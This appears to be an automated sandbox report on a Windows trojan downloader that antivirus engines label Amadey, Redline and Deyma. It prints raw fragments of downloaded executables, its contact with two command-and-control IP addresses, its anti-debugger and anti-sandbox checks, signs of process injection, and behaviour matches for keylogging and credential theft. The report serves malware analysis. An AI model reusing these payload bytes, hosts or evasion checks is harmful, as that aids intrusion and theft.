buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd† chð" š `h—@@`s (ð ) È p- ( Å @(v ð.text˜ š  `.rdataÄó° ô¢ @@.dataX;° – @À.pdata)ð *ª @@.B1J Ô `.gxfg€@ ò @@.retplneŒ`  .tls p  @À_RDATAô€  @@.relocÈ   @B.jssL  L" @À.jssLð Ln @ÀAWAVAUATVWUSHìˆH‹¦£ H1àH‰„$€‹I³ ‹-G³ Xÿ¯Ø‰Ø÷Ѓàþƒó Ãûÿ”D$vA”ÀA•Áƒý AŸÂƒý œD$wœÃE ÂA‰ØE0ÈA ØD ËDÓD‰À0ؽùɜĸl߉¦EńÛDè‰ÖI‰ÎE„ÀDèA¹l߉¦L‹Q¸4_3YA¸è¯›;f=篛;)=l߉¦t =ùɜÄuë駸诛;=篛;~áf.„=诛;ts=4_3Yu¶D$vD¶\$w‰Â€ò‰Ñ Á€ñ‰Ã0ËÁ€ñىÈD ÙA€ó4D ØÁ‰ÐD ØA0ÓAÃD‰Ú0ÊAöø诛;AEÁöÁADÁöÒöÂAEÀ=篛;Ž_ÿÿÿë†L‰T$x‰è=篛;ŽKÿÿÿéoÿÿÿH‹|$xL‰ñè—‹ ð± DyÿD¯ùE‰üA÷ÔD‰ââ4Ú0¹E‰øAàË%ÏFA ÐAð5Ú0¹E àAƒøÿ”D$v‹ ·± ”ÉL$ ƒù œÁœD$w0ˉÚöÒ Ê‰Ù0ф۽ùɜĻl߉¦E݄Һl߉¦DÚH‰D$@„ÉE݉\$$A÷ÐI‹nº4_3Y¸è¯›;f„ú篛;(úl߉¦t úùɜÄuèëwºè¯›;ú篛;~áf„ú诛;tBú4_3YuÀ¶L$v¶T$w0ʉӀó ˉÙ0ÑöÁ¹l߉¦EÈö‰ÊEÐöÃDсú篛;~ë¶H‰l$x‹T$$ú篛;Žyÿÿÿ량ø÷Ð%fp=A‰úAâ™bÂA Â÷ÖAòfp=A òD‰Ð÷Ð1þ÷Ö!þ‰ñ÷ÑD‰Òâï#ž%üÜa ÐA ʁáï#žæüÜa Î1ÆA÷ÒA òH‹|$xHÁïD‰à%Û  'E‰ùAá$ó_ØA ÁAñÚ  'E áAƒùÿ•Á‹D$ ƒø AœÃƒø ŸÀ‰Ã Ë0ÁˉÚ0ʾl߉¦ºùɜÄEքۻùɜÄEڄÉDډ\$4D‰áƒáþAƒçA ÏE1üE…ü•Á” ÂA ËAӉ Ê0ÈЉÁD0Ù¹ùɜÄEκùɜĄÀEщ|$LE„ÛDщT$0A÷ÑA½B~ÇD$(H‰l$8Aý&¦")é÷H‹D$xA½±¾R-f.„fAý&¦"ŽÓAýF`<޶Aý"юb^AýG`<„CAý–ÿÍ<„SAýϊFu¶‹,¯ ‹ *¯ Pÿ¯Ð‰Ð÷Ð% ¬Xâ_éS§ ‰Ð5^éS§ƒàþò¡¬X ƒúÿ”À•ƒù œÃƒù ŸÁ ÈÑ ÓÉØ0ȄÛA½šU¯Âº±¾R-DEê„ɹšU¯ÂDEé„ÀéÍf.„Aý°¾R--Aý'¦"„ÊAýè°²+„ïAýHiý+…üþÿÿ‹r® ‹ p® Pÿ¯Ð‰Ð÷Ѓàþƒò ‰Ð÷Ð%㋄7ât{È Âòt{È•À”ƒù œÃƒù ŸÁ Ê ÃӉÊ0 ÁщÈ0؄ÉA½hф¸¹žïxDEé„ÛDDéD‰\$p„À¸hф¸é Aý#юb„‚Aýžïx„'AýXõð{…TþÿÿH‹D$XHƒøA½G`<¸Hiý+DDèE1ÛAý&¦"9þÿÿf.„fAý1¼ŽAýÒß½øqAý2¼„øAýšU¯Â„Aý0ö…ßýÿÿE…ü‹D$L‹D$L‹D$L‹D$L‹D$L‹D$LH‹D$@”D$vƒ|$ œD$w¸4_3Yf.„=篛;)=l߉¦t =ùɜÄuëém¸è¯›;=篛;~áf.„=诛;tK=4_3Yu¶D$v¶L$w4€ñ‰ÂÊ0Á‰Ð0Ȩ¾è¯›;¸l߉¦EðöÁ‰ð¹è¯›;EÁöÂEÆ=篛;~‡ë®H‰l$x‹D$0=篛;Žqÿÿÿ똄Aýv9ذŽ)Aýw9ذ„êAýã+n¸„Aýhф¸…ÌüÿÿH‹D$P¾8‹L$p‰Ê÷҉Ð% %á\à† Á‰ÎöÀ‚ñh!Ê]ë‡7‰Ð÷Љû÷Ӊýõ]ë‡7!݁ç¢xȁáJ/l1æÀƒ ΁âJ/l1% È Ð1ð‰é!ù1ïH‹l$8 ωÁ÷Ñ!ù÷×!Ç ÏiǕéÑ[‹|$h‰ù÷Ñ‰Ê Â÷Ð÷ҁáO ¹ç°ãóF ρ÷O ¹ Ç÷׉Ð!ø1× Ç‹‹« ‹ ‰« Pÿ¯Ð‰Ð÷
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd† Qùhð" „x3@0ìk``<( ¼ T”(&l «@H?À.textš‚„ `.rdatadÀ Œ@@.dataØ(pN@À.pdataT \@@.B8Ÿ À v `.gxfgpЂ@@.retplneŒð˜_RDATAôš@@.reloclœ@B.jssv v¤@À.jssv  v @À.rsrc¼ @@AWAVAUATVWUSHì˜H‹¦`H1àH‰„$‹õl‹-ólxÿ¯ø‰û÷ӁçQem‰Ø%÷®š’ ø5ö®š’ƒãþ Ãûÿ”D$:ƒý œD$;‰T$4I‰Ì¸ÞwAºhÍÅ A»ñdo¾¶ˆÓÆ=­9뎔ëm‹ŒlHÿ¯È‰È÷Љƒâþƒá Ñ÷Ñ Áƒùÿ”Àƒ=kl œÁ0ȉÂöÒ Ê‰Á0фÀ¸gÅe;½D2ÚYEńҺgÅe;D„ÉEÅf.„=­9ëŽ%=»þX^=fÅe;ŽÄ= òu<Ž=òu<„=ÎÍ@„³ =ñàòCu»D‰l$pD‰t$t‹D$L‹L$t9Á¸¹Ì ³¹><â;é«„=çéˆkŽQ=É|tŽ$=É|t„ =üBy„ =Þw…YÿÿÿŠD$:ŠL$;‰Â€ò0ȀñщÂ0ʨ¸övòè½òu<EÅöÁ¹övòèEÁöÂé²=aŠ+P=®9ë„§þÿÿ=½uÍ…þþÿÿH‹D$XHƒø¸¼þX¹›…±LÁE1ÿ=­9ëåþÿÿf.„=¸Ì ³I=±e÷£ŽI=8„–©Ž5=9„–©„Ú =kT&«„ =p ‘­…’þÿÿ¸µ´X’=­9ë~¶éŒþÿÿ=õvòèŽ>=—z«þŽT=˜z«þ„3 =›…±„6 =BZû…Iþÿÿ¸©{@¼=­9ëŽiÿÿÿé?þÿÿ=_E[O=¼þX„Z =D2ÚY…þÿÿ‹ =j‹=;jQÿ¯Ñ‰Ñ÷сáŒ(́âsì×2 ʉсñsì×2ò„(€â·ù€‰ÍåHø ՁõIøƒáþ é‰Ê÷ҁâHMρᷲç0 сñ·²ç0”Á•Àƒÿ œÃƒÿ ŸÂ Ñ ÃˉÙ0ф۸ÎÍ@½µ´X’EńҺÎÍ@éŸ=´´X’==ç°<€„¾ =M…Týÿÿ¸.cÁ‹L$d‰L$,=­9ëŽlþÿÿéBýÿÿ=.cÁ–=¹Ì ³„® =©{@¼…ýÿÿ‹ @i‹=>iQÿ¯Ñ‰Ñ÷сáõ¿A+â @¾Ô ʉՁõ @¾Ôò¤¹â¬¹ ‰éáSF_ø сñRF_øƒåþ ̓ýÿ”À•ƒÿ œÃƒÿ ŸÁÑ0ÉÈ0غïÄ6©¸BZûEЄۉнïÄ6©EńÉEÂ=­9ë޳ýÿÿé‰üÿÿ=²e÷£„6=ïÄ6©…hüÿÿ¸ñàòCE1öD‹l$<=­9뎀ýÿÿéVüÿÿ=gÅe;„ =><â;…5üÿÿHcD$tH‹L$@i •éÑ[‰ÈÁè‰Å÷Չêâ5Lƒàä ЉÊ÷Ò55L ЉÃ÷Ӂâp“×ñál( сñp“×ñ é‰Ê÷҉Ł劚jiãue•– ë ȁኚjiƒâu Ê1Ú÷Ð ÐiȕéÑ[iD$p•éÑ[÷ÐA‰ÅA ÍD‰ê÷Ò1È÷Ð!ȉÁ÷ÑD‰íå^Ї?â¡/xÀ êA ́á^Ї?%¡/xÀ È1ÐA÷ÕA ÅD‹t$tAƒÆ¸ñàòC=­9뎋üÿÿéaûÿÿ=èéˆk„) =¥ˆÆq…@ûÿÿ‹jgHÿ¯È‰È÷Ð%÷݁á€ã" Á‰È5€ã"ñ£4]á«4Ñ]‰ÂâTË.¢ ʁòUË.¢ƒàþ Ѓøÿ”Àƒ="g œÁ0ȉÂöÒ Ê‰Á0фÀ¸É|t½üByEńҺÉ|té²úÿÿ=bŠ+„j =7v7…®úÿÿ‹„$€‹„$€‹„$€‹„$€‹„$€‹„$€‹„$€‹„$€‹„$€‹„$€‹’fHÿ¯È‰È÷Љƒâþƒá Ñ1ȅÈ”Àƒ=tf œÁ0ȉÂöÒ Ê‰Á0фÀ¸EÝô”½p ‘­EńҺEÝô”éúÿÿ=övòè„Ù=¯U#ê…úÿÿH‹D$XHƒø¸½u͹ç°<€LÁ=­9ëŽûÿÿéåùÿÿ=`E[„É =8‘`g…Äùÿÿ‹ îe‹=ìeQÿ¯Ñ‰Ñ÷сá^ ;Xâ¡óħ ʉՁõ¡óħòX"PâøâfՉéá™* сñ™*ƒåþ ̓ýÿ”Á•Àƒÿ œÃƒÿ ŸÂ Ñ ÃˉÑ0ل۸gÅe;½®9ëEńҺgÅe;E‹T$0‰”$€é· =µ´X’„O =EÝô”…ùÿÿ‹„$€‹„$€‹„$€‹„$€‹„$€‹„$€
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL£wLgà  "&è+%@@p(ÜÕ'‰è˜!d`(D V(@° .text©  `.rdata˜@@@.data@?à@Àss0‡  `ss18°@Àss2—À˜ `.rsrcD `( ž@@œÆ'&9(úÎ# €éR h…¡9Åd$Ý*çh"S_˜D$f3óÁl$¸öT$fÿÎÀt$æÁd$fö7dfÿÆèh²°7¸h)k?fò7dÀD$¦ƒ ˆh= *Lf‰hƒ` (é´ þ¨U,®nŽ»¹¶~IÄËOBDj›óë?«?|$&ÀUHE‰ÁýeT ž»cHØç»^Ï*Òêˆà±²hQÏQ/Ü¯ÃÕɬÛN8UTÀ’~Ý$\˧!‘2°ôÀ've_> Å_#úª…ÙX$¡Ÿ vÞêE^ ÿ›…%¿ GÊ8‘’³B:Y_vèä•2憞?«Ç§ÆÖ(Bù×ÀT8¾VÑ·À[èœãjcÃðP/sšæ`‚#yåÐhS¹•㎠ue¤÷՝ è7`<êïȦÈebú.ÊäñÒ2;TÉ6ËwäM˜ŽhJRÞ ÃÝe3§²áÙ8_÷œzÛ†Y5“««nG‰²Ò‚kŠÀ(Û=ˆ€!‹ª 2¶Ã¨üóÙd•ß'§¬ õŽœ°qïtŸûƒeSLTê­õ#)ý„ éNj` OœâN*ˆ¸ŸÙººöÁ<@xàы„™(7^8‹`„À ‰[ºÀºl8Ñ÷}À%Í>•4 ž¿To™þV=ÉÐA=§€ÊJ{=_$yUé(‹`…DÆû¸Üv˜LtŸ{ ‘‡ùæ¡›tŸûÔt[vÔÚæéE.z“lÑ÷.›“æfW•´Ge×¼ZXÙ-(ûVa§_$6}ñtŸ{¯v@›Ì)ÏÆ´jôNü®õ@üý]JâåÉsçL„³ŽU ½ð³[霠óÑÈS‚ÂTh¥HÕ0¸‰»nÎùQ.rדZ§K,¿{U§zéUžÿÊèÿWhÕîÙ¿ÂT5x¡ØxcÓ̐=IÈ%éà®:³”<Cؑý)ê‹ê˜ÓºtI’mb¯0joüô zo`Éþ™’wLž‹V“¢ )Ñ $ ž“;8˜‹ßz›C/ÁÌûˆFÑç¯þÄÌ{š£†Ž*lØ]t“ÌûþëFg:UFýÓéuˆêáéå.»ò9U Äަ‹L䈎ƒ½$ÔíoÀs~V2hóˆoj½XÆÉñÙ7‚¿¥t‰dÀþj_°MpAvÞ¥K)K²/[úTEã?·ùúÀLŸû]í«<2z+LŸ{O±º,@ÍÏ[Á°µ€ ¸³` ¦ÁÀáH6‹°MíÕÄè¤üi¬Iš6Š®äxEzµ‚*úÁÃ^*¯[^àٓùý„$s˜£]BÇ36ÕP¨‹Z³`Ýam.¦¥Â[LŸ{_ºü¿éioLŸûä%§{uU[»LŸ{ßP}œ Uóc^öåmÆýÛ·.³.Zß:êˆóUÉôË3Õw’ÉIBã_ၭ¹Ž´LŸûû»%ƒqƒ*Vá˜óÄ &Û†3IÕð(£Ä¨I5´//ÜȘ ù€b>Ì%?úùu’ÄT/ÿ2á׍TÌó[t(±Íåm\"¶·$ܾù1;àÔ ¶þ¬àÑy*ð!ÄT۟ðX#wöŠ/Ê~G‰Üdo¿€Üfòõ3ú;y éð±èé$‚÷’¶ÑfÿÀºø™;ó¸9Žã8é~f‰hŸšŠ¨èŽA»¸ŒXA·ËI‹âQDŽLàþÿ‰‘þQN‹¤þGs§D·”Ìp?úÿN‹´Hs§A‹òA¿ú¸,…NJ‹¬Hs§D‹ÉéÃX¾Rk¨eú§…ù ©SsÒxM`L žHf&‡gØIÊ«d´Ñ„øÀäáúÀpæšWçÖðdUõÊbMì˜%À%GËÊYh´ê/Bœ|$‘³ŠïHÇD$xnÞ8ÿt$Hd$è^ü Žâ6Õ-…ä­{†¢mwªad–žrëÄü?…€ÑùÌ`ÿÆÊ¶¸bU¬ü/¦[‡¹-x™ûg,¯û.û ýp¡,¯{*ëêf=L>ît1ˆójÓP â¹ ØÀ;†½Ã7T¥Û#»2ϐ$.²ï¯Ö/,¯û5‘æå ßÓP„t‹ì“pSiÓP&†ªÍ€<¶3#;,éw¤}K‹¦{ãÒ¤0-…âJI°ÌJÞ6…0©€ø[ÖÙ§ $ΟLׯT»;šRcUÁ„?Ÿ”Àeà•¤ê~{Ðå ©Âý2ye'zËXÅ4L'AÆTrº¿è@+î’/Ê: -¹à@{˔ÈM¦8Ԃ­rtièªúú'Ä"Ê¥WQÆT‡¸‰4Ñ5 FÚÀg|Ì¿ë^:ï ÒãÉRBncm.Á¤‡ŽÁ2Ì6éU>˜ÚdðÉ ÔGеêÐ@¶·ð$8¯G<ÁM«Ø29ÇÇ[X‡a“†#g²W·ßÇ9¯Gn ¬­9k‡®3ÆQøõ–{Tüƒâ{9«ÿWÞñÆPx!èpöôÀ9®‡Q™¬/ãE€Æ[àªÅÅ»/¾Ímb>£×nó"TÀõSmáN£¢>W®ìAfن[’wmqh³¬“¨5AàhéEªx«b`gx þ:[=dcZvb‚âºÇ 鯢:ªÒã}˜}bŽ€Àö^KQñpL/)1ø“x> ç ‹*Ç ,‡-õ p›{àí}^¢$p›ûz„…ᖋ2ëÑp›{ž>»¡ìPÚc "ŒUéýrz½X¸‰ã~ÞÑy ™±}£oc`AàÄlj*Ɛdyû*ÈT`ˆQ-u­œê~;£À`X ¾Ú;ÖVÅ)ʃþ]ëÃPŽa®xuèªV0ÈT}L‚§KäŸËR.ïæß­´“ÇD$‘Ú(ÐÊé“˹„š¿E‹4"f»ÉQH‰L$AŠL"ÀD$ ƒHÁt$ IÒfÁd$ cè“;Ã9rÐjXOU|6-0N Œ†ž] «÷zñ•æ Œº ¡Ÿ; Íq\º ¯Šãi¢l49uña ®,VNe¸ 8$Ë|ãÇ ¹9½Gà ‘Ck8ê· *¬/,K:«H ½ g¯â@esJóÑ#ä Ô –!#-vg5û#ºßf_ —I  N §òÙ ;‡Qg ÖÀsŸúšÙv¹÷+Øþçn­¦ˆ²
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $ù\Zî—Zî—Zî—–”_î—–’ìî—–“Kî—Kh”Pî—Kh“Kî—Kh’î—––Sî—Zî–Îî—¢iž[î—¢ih[î—¢i•[î—RichZî—PEd†²Fhð" +´ÖPv@Ð`\ d°àp3ÀÜ `½p ¼@Ѐ.text¨³´ `.rdatab\Ð^¸@@.data¤50@À.pdata3p4.@@.rsrcà°b@@.relocÜ À d@BH‰\$UH¬$0ÿÿÿHìÐWÀD$03ÛH‰\$@H‰\$HA¸H–œHL$0è ¿WÀD$PH‰\$`H‰\$hA¸HpœHL$Pèv¿WÀD$pH‰]€H‰]ˆA¸HLœHL$pèN¿WÀEH‰] H‰]¨A¸H)œHMè(¿WÀE°H‰]ÀH‰]ÈA¸HœHM°è¿WÀEÐH‰]àH‰]èA¸Hå›HMÐèܾWÀEðH‰]H‰]A¸HÛHMðè¶¾WÀEH‰] H‰](A¸H¡›HM萾WÀE0H‰]@H‰]HA¸H›HM0èj¾WÀEPH‰]`H‰]hA¸H]›HMPèD¾WÀEpH‰€H‰ˆA¸H5›HMp辐WÀ…H‰ H‰¨A¸H ›Hè潐WÀ…°H‰ÀH‰ÈA¸HàšH°è´½HD$0H‰D$ H…ÐH‰D$(HT$ H SèlhL ´kº A¸ HL$0èC^H Ø­H‹œ$àHÄÐ]éaÌÌÌH‰\$UH¬$PþÿÿHì°WÀD$03ÛH‰\$@H‰\$HA¸H>šHL$0轐WÀD$PH‰\$`H‰\$hA¸ H šHL$Pèæ¼WÀD$pH‰]€H‰]ˆA¸ HšHL$pè¾¼WÀEH‰] H‰]¨A¸Hñ™HMè˜¼WÀE°H‰]ÀH‰]ÈA¸HיHM°èr¼WÀEÐH‰]àH‰]èA¸H½™HMÐèL¼WÀEðH‰]H‰]A¸H£™HMðè&¼WÀEH‰] H‰](A¸H…™HM輐WÀE0H‰]@H‰]HA¸ Hk™HM0èÚ»WÀEPH‰]`H‰]hA¸HU™HMPè´»WÀEpH‰€H‰ˆA¸H1™HMp舻WÀ…H‰ H‰¨A¸ H ™HèV»WÀ…°H‰ÀH‰ÈA¸Hè˜H°è$»WÀ…ÐH‰àH‰èA¸H˜HÐèòºWÀ…ðH‰H‰A¸Hœ˜HðèÀºWÀ…H‰ H‰(A¸Hz˜H莺WÀ…0H‰@H‰HA¸ HX˜H0è\ºWÀ…PH‰`H‰hA¸H6˜HPè*ºWÀ…pH‰€H‰ˆA¸H ˜Hpèø¹WÀ…H‰ H‰¨A¸ Hâ—HèƹHD$0H‰D$ H…°H‰D$(HT$ H Oè~dL Ægº A¸HL$0èUZH *ªH‹œ$ÀHÄ°]é1]ÌÌÌÌÌH‰\$UH¬$PþÿÿHì°WÀD$03ÛH‰\$@H‰\$HA¸HJ—HL$0è ¹WÀD$PH‰\$`H‰\$hA¸ H(—HL$Pèö¸WÀD$pH‰]€H‰]ˆA¸ H—HL$pèθWÀEH‰] H‰]¨A¸Hù–HMè¨¸WÀE°H‰]ÀH‰]ÈA¸Hã–HM°è‚¸WÀEÐH‰]àH‰]èA¸HɖHMÐè\¸WÀEðH‰]H‰]A¸H«–HMðè6¸WÀEH‰] H‰](A¸H‘–HM踐WÀE0H‰]@H‰]HA¸Hw–HM0è귐WÀEPH‰]`H‰]hA¸H1–HMPèÄ·WÀEpH‰€H‰ˆA¸H-–HMp蘷WÀ…H‰ H‰¨A¸ H –Hèf·WÀ…°H‰ÀH‰ÈA¸Hè•H°è4·WÀ…ÐH‰àH‰èA¸ H¾•HÐ跐WÀ…ðH‰H‰A¸Hœ•HðèжWÀ…H‰ H‰(A¸Hz•H螶WÀ…0H‰@H‰HA¸ HX•H0èl¶WÀ…PH‰`H‰hA¸H2•HPè:¶WÀ…pH‰€H‰ˆA¸H•Hp趐WÀ…H‰ H‰¨A¸ Hâ”HèÖµHD$0H‰D$ H…°H‰D$(HT$ H #KèŽ`L Öcº A¸HL$0èeVH z¦H‹œ$ÀHÄ°]éAYÌHƒì(H ),èDH …¦HƒÄ(é YHƒì(A¹HÓ-E3ÀH Y-èH a¦HƒÄ(éðX@SHƒì ¹èÔéH -H‹Øèu—H¾E3ÀH‹ÓH‰-H z-èµ H f¦HƒÄ [é XH‹­5Læ,L‰§5H…ÒtH‹HcHL‰DPL‹5H‹5H…Òt H‹HcHL‰DPÃÌÌHƒì(H ‘,è\H ¦HƒÄ(é8XH ¦é,XH Q¦é XHƒì(A¹H.E3ÀH ™.蔙H e¦HƒÄ(éðW@SHƒì 3Éè×èH Ð-H‹Øèx–H½E3ÀH‹ÓH‰´-H ­-è¸H m¦H
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x0020e400', u'virtual_address': u'0x0000c000', u'entropy': 7.983756134260713, u'name': u'.rsrc', u'virtual_size': u'0x0020f000'} entropy 7.98375613426 description A section with a high entropy has been found
entropy 0.984795321637 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
process system
url http://www.microsoft.com/schemas/ie8tldlistdescription/1.0
url http://purl.org/rss/1.0/
url http://www.passport.com
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Hijack network configuration rule Hijack_Network
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Install itself for autorun at Windows startup rule Persistence
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
Time & API Arguments Status Return Repeated

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d}
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x00000001
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d}
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d}.RebootRequired
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x00000001
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d}.RebootRequired
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d}
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x00000001
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d}
2 0
host 185.215.113.41
host 185.215.113.59
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
file \??\SICE
file \??\SIWVID
file \??\NTICE
Time & API Arguments Status Return Repeated

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: Registry Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: Registry Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
file C:\Windows\Tasks\namez.job
file C:\Windows\Temp\{EF976DFB-4649-42AA-AF77-3A03FEF11467}\.ba\Portal-Ech64.exe
Process injection Process 2796 resumed a thread in remote process 2788
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000138
suspend_count: 0
process_identifier: 2788
1 0 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed 64 8f 05 00 00 00 00 55 89 04 24 54 58 05 04
exception.symbol: 2w7420+0x1e24b9
exception.instruction: in eax, dx
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 1975481
exception.address: 0x14d24b9
registers.esp: 4062844
registers.edi: 134889
registers.eax: 1447909480
registers.ebp: 4010274836
registers.edx: 22104
registers.ebx: 1971327157
registers.esi: 21824621
registers.ecx: 20
1 0 0
Bkav W32.AIDetectMalware
Cynet Malicious (score: 100)
CAT-QuickHeal Trojandownloader.Deyma
Skyhigh BehavesLike.Win32.Lockbit.vc
ALYac Gen:Variant.Symmi.93663
Cylance Unsafe
VIPRE Gen:Variant.Doina.48214
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (D)
K7GW Trojan ( 005aad751 )
K7AntiVirus Trojan ( 005aad751 )
Baidu Win32.Trojan.Delf.in
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 multiple detections
APEX Malicious
Avast Win32:MalwareX-gen [Adw]
Kaspersky UDS:Trojan-Downloader.Win32.Deyma.gen
NANO-Antivirus Trojan.Win32.Deyma.kwwbbz
MicroWorld-eScan Gen:Variant.Doina.48214
Rising Trojan.Agent!1.12B48 (CLASSIC)
F-Secure Trojan.TR/Redcap.tclid
DrWeb Trojan.Packed2.48355
Zillya Trojan.AgentGen.Win32.94
TrendMicro Trojan.Win32.AMADEY.YXFDOZ
Trapmine malicious.moderate.ml.score
Sophos Troj/Amadey-O
SentinelOne Static AI - Malicious SFX
Google Detected
Avira TR/Redcap.tclid
Antiy-AVL Trojan[Downloader]/Win32.Deyma
Gridinsoft Spy.Win32.Redline.lu!heur
Microsoft Trojan:Win32/Multiverze!rfn
ZoneAlarm Troj/Amadey-O
Varist W32/Kryptik.JKR.gen!Eldorado
McAfee Artemis!3EC886E81B3A
Malwarebytes Malware.AI.3966811931
Ikarus Trojan.MSIL.Disabler
Zoner Probably Heur.ExeHeaderL
TrendMicro-HouseCall Trojan.Win32.VSX.PE04C9V
